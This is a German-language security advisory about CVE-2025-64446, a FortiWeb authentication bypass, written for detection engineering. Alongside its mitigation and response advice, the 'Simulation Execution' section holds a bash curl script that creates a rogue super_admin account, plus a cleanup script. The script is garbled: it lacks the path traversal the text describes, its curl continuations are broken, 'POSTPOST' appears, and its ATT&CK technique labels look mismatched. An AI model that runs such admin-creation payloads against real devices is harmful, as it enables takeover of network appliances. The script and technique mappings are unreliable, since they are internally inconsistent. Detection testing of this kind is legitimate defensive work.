SOC Prime Bias: Kritisch

19 Nov. 2025 12:12
newspaper icon horizon3.ai

Fortinet FortiWeb Authentifizierungsumgehung durch Path-Traversal-Sicherheitslücke (CVE-2025-64446)

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Fortinet FortiWeb Authentifizierungsumgehung durch Path-Traversal-Sicherheitslücke (CVE-2025-64446)
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Eine neu offengelegte kritische Authentifizierungs-Bypass-Schwachstelle in Fortinet FortiWeb, verfolgt als CVE-2025-64446, ermöglicht es nicht authentifizierten Angreifern, durch eine manipulierte Pfad-Traversal-Anfrage administrative Konten zu erstellen. Laut öffentlich zugänglichen Berichten wurde die Schwachstelle seit Anfang Oktober 2025 aktiv ausgenutzt und aufgrund ihrer Schwere später in offizielle Bedrohungskataloge aufgenommen. Eine erfolgreiche Ausnutzung gibt vollständige Kontrolle über das betroffene WAF-Gerät und kann Angreifern ermöglichen, tiefer in interne Netzwerke vorzudringen. Frühe Untersuchungen zu CVE-2025-64446 zeigen, dass Ausnutzungsversuche weiterhin auf internet-öffentliche FortiWeb-Geräte abzielen.

Analyse von CVE-2025-64446

CVE-2025-64446 betrifft mehrere FortiWeb-Versionen und ermöglicht es Angreifern, eine manipulierte schädliche HTTP-POST-Anfrage an den API-Endpunkt zu senden. Die Verzeichnis-Traversal-Sequenz ermöglicht den Zugriff auf das administrative CGI-Skript, das für die Benutzererstellung verantwortlich ist. Dies führt zu einem neuen Admin-Konto auf dem Gerät und gewährt vollständige Kontrolle durch den Angreifer. Da FortiWeb-Geräte eng mit anderen Fortinet-Produkten arbeiten, erhöht diese Schwachstelle die Exposition des gesamten Ökosystems. Ein erfolgreicher Angriff könnte es Angreifern ermöglichen, sich seitlich zu bewegen und zusätzliche verbundene Systeme und Dienste zu kompromittieren. Zuvor beobachtete Angriffe auf FortiWeb (einschließlich Aktivitäten rund um CVE-2025-25257) verstärken die Wahrscheinlichkeit einer weiteren Zielausrichtung.

Minderung

Fortinet hat Patches für alle betroffenen Versionen veröffentlicht. Die sofortige Minderung von CVE-2025-64446 erfordert ein Upgrade auf die neueste behobene Produktversion 8.0.2. Empfohlene Minderungsmaßnahmen umfassen die Beschränkung des Zugriffs auf die Management-Schnittstelle auf vertrauenswürdige IP-Adressen oder ein VPN, die Durchsetzung von MFA für administrative Zugriffe, das Drehen von Anmeldedaten für alle FortiWeb-Admin-Konten, die Überwachung der Admin-API-Aktivität auf anomale Benutzererstellungsvorgänge und die Entfernung der HTTP/HTTPS-Management-Exposition aus dem öffentlichen Internet. Organisationen sollten auch interne Patch-Testverfahren befolgen, um betriebliche Unterbrechungen zu vermeiden.

Reaktion

Sicherheitsteams sollten das Versionsinventar bestätigen, Patches ohne Verzögerung anwenden und den externen Verwaltungszugriff deaktivieren, wenn ein sofortiges Upgrade nicht möglich ist. Angesichts aktiver Ausnutzungsversuche ist es ratsam, die Überwachung auf verdächtige POST-Anfragen, die den verwundbaren API-Pfad anvisieren, zu verbessern. Wenn bestehende Konten unerwartete Änderungen zeigen, drehen Sie die Anmeldedaten und überprüfen Sie Audit-Logs in erhöhter Frequenz. Die Sammlung von CVE-2025-64446 IOCs, die Überprüfung von Verkehrsmustern und die Korrelation mit jüngster Ausnutzungsaktivität werden die Sichtbarkeit verbessern und das Risiko reduzieren.

Angriffsfluss

Wir aktualisieren diesen Teil noch. Melden Sie sich an, um benachrichtigt zu werden

Benachrichtige Mich

Simulation Execution

Voraussetzung: Die Telemetrie- & Basislinie-Pre‑flight-Check muss bestanden sein.

Begründung: In diesem Abschnitt werden die präzise Ausführung der gegnerischen Taktik (TTP) beschrieben, die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen müssen die identifizierten TTPs direkt widerspiegeln und sollen die Telemetrie erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffsgeschichte & Befehle:

    1. Aufklärung (T1016.001): Der Angreifer entdeckt die öffentliche IP des FortiWeb-Geräts über Open-Source-Intelligenz.
    2. Anmeldeinformationen ernten / Rechteausweitung (T1567.004): Mit dem aufgedeckten CVE‑2025‑64446 erstellt der Angreifer eine bösartige POST-Nutzlast, die einen neuen Admin-Benutzer mit vollen Rechten erstellt.
    3. Ausführung: Der Angreifer sendet die manipulierte Anfrage über HTTPS, wobei request_method POSTPOST ist und request_uri genau /api/v2.0/cmdb/system/admin.

  • Regression Test Script:

    #!/usr/bin/env bash
# Exploit CVE-2025-64446 to create a new FortiWeb admin account
# Adjust variables as needed for the target environment

TARGET="https://fortiweb.example.com"
ENDPOINT="/api/v2.0/cmdb/system/admin"
NEW_USER="eviladmin"
NEW_PASS="P@ssw0rd!2025"
# The vulnerable API does not require authentication for this endpoint (as per CVE)
PAYLOAD=$(cat <<EOF
{
    "name": "${NEW_USER}",
    "password": "${NEW_PASS}",
    "privilege": "super_admin"
}
EOF
)

echo "[*] Sending malicious POST to ${TARGET}${ENDPOINT}"
curl -k -X POST "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/json" 
     -d "${PAYLOAD}" 
     -o /dev/null -s -w "HTTP %{http_code}n"

echo "[*] Attack simulation complete."

  • Bereinigungskommandos:

    #!/usr/bin/env bash
# Remove the malicious admin account created during the test
TARGET="https://fortiweb.example.com"
ENDPOINT="/api/v2.0/cmdb/system/admin/${NEW_USER}"

echo "[*] Deleting test admin account ${NEW_USER}"
curl -k -X DELETE "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/json" 
     -o /dev/null -s -w "HTTP %{http_code}n"

echo "[*] Cleanup complete."

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit in Bedrohungen zu verbessern, die für Ihr Unternehmen am relevantesten sind. Um Ihnen den Einstieg zu erleichtern und sofortigen Nutzen zu bieten, buchen Sie jetzt ein Treffen mit SOC Prime-Experten.

Kostenlos beitreten